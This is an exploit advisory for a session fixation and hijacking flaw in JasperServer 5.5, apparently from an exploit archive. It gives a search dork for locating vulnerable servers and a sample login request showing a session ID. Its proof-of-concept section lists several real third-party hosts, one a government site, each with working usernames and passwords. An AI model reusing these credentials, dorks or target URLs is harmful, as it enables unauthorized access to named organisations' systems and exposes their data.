Jasper Server 5.5 Session Fixation

[+] Session Fixation / Hijacking on JasperServer

[+] Date: 09/05/2014

[+] Risk: High

[+] CWE number: CWE-384 

[+] Author: Felipe Andrian Peixoto

[+] Vendor Homepage: http://www.jaspersoft.com/

[+] Software Download : http://sourceforge.net/projects/jasperserver/

[+] Contact: felipe_andrian@hotmail.com

[+] Tested on: Windows 7 and Gnu/Linux

[+] Dork: intitle:JasperServer + inurl:j_password // use your brain ;)

[+] Exploit : 

        http://host/patch//flow.html?_flowId=searchFlow&j_username=<username>&j_password=<password>

         or

        http://host/patch/j_acegi_security_check?j_username=<username>&j_password=<password>

As part of the login process, the assigned session ID is revealed in a URL parameter that alows Hijack the session of some user.

Example:

    Vul example: coopnet.leosoft.com.br

   GET /coopnet/j_acegi_security_check?j_username=teste&j_password=teste
   Host: coopnet.leosoft.com.br
   User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:28.0) Gecko/20100101 Firefox/28.0
   Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 
   With a request like that the session ID of the user will be revealed in a url paramter:

       "JSESSIONID=4635974EAA38774EF00FB270933D3C7D"


    The application authenticates users with a direct post to the j_acegi_security_check, which does not invalidate the existing session
 before processing the login request.

                  <form method="POST" action="j_acegi_security_check">
                  <input type="text" name="j_username">
                  <input type="text" name="j_password">
                  </form>
 
   Because Of that is possible authenticate a user, or otherwise establishing a new user session, without invalidating any existing session.

[+] PoC : http://www2.emater.mg.gov.br/jasperserver/flow.html?_flowId=searchFlow&j_username=esloc&j_password=esloc
  
           j_username=esloc  & j_password=esloc

          http://jrs.logifleet.com/jrs471/flow.html?_flowId=homeFlow&j_username=Scheuchzer%7CScheuchzer&j_password=Scheuchzer

           j_username=Scheuchzer%7CScheuchzer & j_password=Scheuchzer

          http://jasper.ffex.net:8080/jasperserver/flow.html?_flowId=searchFlow&&j_username=ratequote&j_password=rateme9

           j_username=ratequote & j_password=rateme9


More About session fixation technique on : http://cwe.mitre.org/data/definitions/384.html